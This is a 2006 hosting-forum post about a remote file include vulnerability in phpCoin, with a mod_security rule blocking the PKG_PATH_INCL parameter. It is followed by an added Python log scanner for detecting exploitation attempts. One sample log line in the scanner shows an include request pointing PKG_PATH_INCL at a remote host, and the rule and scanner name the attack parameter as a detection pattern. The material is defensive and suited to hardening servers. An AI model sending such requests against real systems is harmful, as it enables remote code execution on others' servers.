
SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

    cmeisinger
    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your mod_security configuration.


    # mod_security 1.x rule: return 403 for any request containing the string PKG_PATH_INCL
    SecFilter "PKG_PATH_INCL"

    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting
    www.wingsix.com


    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file; now I'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
     
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006
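The SecFilter rule in the post stops new requests, but it says nothing about requests that arrived before the rule was in place. The following scanner is an added example, not code from the post or from phpCoin/cPanel: it reads Apache combined-format access-log lines, pulls out any query-string parameter whose name contains PKG_PATH_INCL (case-insensitively, after URL decoding, so encoded or array-style names like cfg[pkg_path_incl] are caught too), and reports whether the value points at another server, which is the remote-include case the post describes. The log lines, the 203.0.113.x/198.51.100.x addresses and the path coin_includes/example.php are constructed placeholders, not real phpCoin file names or real traffic.

```python
"""Scan Apache combined-format access-log lines for requests carrying a
PKG_PATH_INCL parameter, the phpCoin remote-file-include indicator from the post.

Added example, not part of the original post.  Sample log lines, client
addresses and the path coin_includes/example.php are constructed placeholders.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" format: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# URL schemes PHP's include() can fetch from a remote host when allow_url_fopen is on
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def find_include_params(target: str):
    """Return (name, value) pairs from the query string whose name contains PKG_PATH_INCL.

    parse_qsl URL-decodes names and values, and the comparison is case-insensitive,
    so encoded variants such as cfg%5Bpkg_path_incl%5D are not missed.  Matching the
    substring rather than an exact name mirrors the post's SecFilter rule.
    """
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if "PKG_PATH_INCL" in name.upper():
            hits.append((name, value))
    return hits


def classify(target: str) -> str:
    """Classify a request target as:
       'clean'          - no PKG_PATH_INCL parameter at all
       'suspicious'     - parameter present, value is not a remote URL
       'remote_include' - parameter value points at another server
    """
    hits = find_include_params(target)
    if not hits:
        return "clean"
    for _name, value in hits:
        if unquote(value).strip().lower().startswith(REMOTE_SCHEMES):
            return "remote_include"
    return "suspicious"


def scan_log(lines):
    """Yield (client, time, verdict, target) for each parsable line that is not clean."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than crash on junk lines
        verdict = classify(m["target"])
        if verdict != "clean":
            yield (m["client"], m["time"], verdict, m["target"])


# Constructed sample lines (not real traffic); documentation-range addresses only
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Aug/2006:10:00:01 -0500] "GET /phpcoin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Aug/2006:10:00:05 -0500] "GET /phpcoin/coin_includes/example.php?PKG_PATH_INCL=http://203.0.113.5/x.txt HTTP/1.1" 200 331 "-" "curl/7.15"',
    '203.0.113.9 - - [26/Aug/2006:10:00:09 -0500] "GET /phpcoin/coin_includes/example.php?cfg%5Bpkg_path_incl%5D=foo HTTP/1.1" 403 211 "-" "curl/7.15"',
    'garbage line that does not parse',
]


def main():
    for client, when, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{when} {client} {verdict:15s} {target}")


if __name__ == "__main__":
    main()
```

A 403 in the status column for a flagged line means the mod_security rule already rejected it; a 200 on a remote_include line is the one worth investigating, since the script ran with the parameter present.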